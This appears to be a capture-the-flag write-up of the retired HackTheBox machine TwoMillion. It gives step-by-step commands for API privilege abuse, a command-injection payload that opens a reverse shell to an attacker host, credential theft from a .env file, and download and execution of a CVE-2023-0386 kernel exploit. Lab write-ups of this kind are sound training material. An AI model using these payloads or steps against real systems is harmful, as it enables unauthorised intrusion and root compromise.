Share
## https://sploitus.com/exploit?id=13F033B2-745F-51C4-BA39-85A46F1C53B3
# HTB-TwoMillion-Writeup
HackTheBox TwoMillion machine writeup โ€” API abuse, command injection & CVE-2023-0386
# HackTheBox โ€” TwoMillion Writeup

# HackTheBox โ€” TwoMillion Writeup

![HTB](https://img.shields.io/badge/HackTheBox-TwoMillion-green)
![Difficulty](https://img.shields.io/badge/Difficulty-Easy-blue)
![OS](https://img.shields.io/badge/OS-Linux-orange)

## Machine Info

| Field | Details |
|---|---|
| Name | TwoMillion |
| Difficulty | Easy |
| OS | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |

---

## Summary
TwoMillion is an Easy Linux machine themed around the old HackTheBox platform. It involves decoding an invite code, abusing API endpoints, OS command injection, credential discovery, and a Linux kernel privilege escalation via CVE-2023-0386 (OverlayFS).

---

## Enumeration

### Nmap
```bash
nmap -sV -sC -v 10.10.11.221
```

**Open Ports:**
- 22 โ€” OpenSSH 8.9p1
- 80 โ€” HTTP nginx โ†’ redirects to `2million.htb`

Add to `/etc/hosts`:
```bash
echo "10.10.11.221 2million.htb" >> /etc/hosts
```

---

## Step 1 โ€” Invite Code

```bash
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
```
Response is ROT13 encoded. Decode it:
```bash
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
```
Generate the invite code:
```bash
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
```
Register at `http://2million.htb/register` using the decoded invite code.

---

## Step 2 โ€” API Abuse โ†’ Admin

Login via browser, grab `PHPSESSID` from cookies (F12 โ†’ Application โ†’ Cookies).

Escalate to admin:
```bash
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
  -b "PHPSESSID=" \
  -H "Content-Type: application/json" \
  --data '{"email":"user@test.com","is_admin":1}'
```
Verify:
```bash
curl -b "PHPSESSID=" http://2million.htb/api/v1/admin/auth
# {"message":true}
```

---

## Step 3 โ€” Command Injection โ†’ Reverse Shell

Start listener:
```bash
nc -lvnp 4444
```
Send reverse shell payload:
```bash
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
  -b "PHPSESSID=" \
  -H "Content-Type: application/json" \
  --data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
```
Shell received as `www-data`.

---

## Step 4 โ€” User Flag

Find credentials in `.env`:
```bash
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
```
SSH in:
```bash
ssh admin@10.10.11.221
cat ~/user.txt
```

---

## Step 5 โ€” Root Flag (CVE-2023-0386)

Check the hint:
```bash
cat /var/mail/admin
uname -r
# 5.15.70 โ€” vulnerable to CVE-2023-0386
```
Download and compile exploit on Kali:
```bash
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
```
Transfer to target:
```bash
# Kali
python3 -m http.server 8000

# Target
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
```
Run in two terminals on the target:

**Terminal 1:**
```bash
./fuse ./ovlcap/lower ./gc
```
**Terminal 2:**
```bash
./exp
```
Grab root flag:
```bash
cat /root/root.txt
```

---

## Attack Chain

| Step | Technique |
|---|---|
| Recon | Nmap scan |
| Invite Code | ROT13 + Base64 decode |
| Web PrivEsc | API manipulation โ†’ admin |
| Initial Shell | OS command injection |
| Lateral Movement | .env credentials โ†’ SSH |
| Root | CVE-2023-0386 OverlayFS exploit |

---

## Tools Used
- Nmap
- curl
- Netcat
- CVE-2023-0386 PoC

---

*This writeup is for educational purposes only on a retired HackTheBox machine.*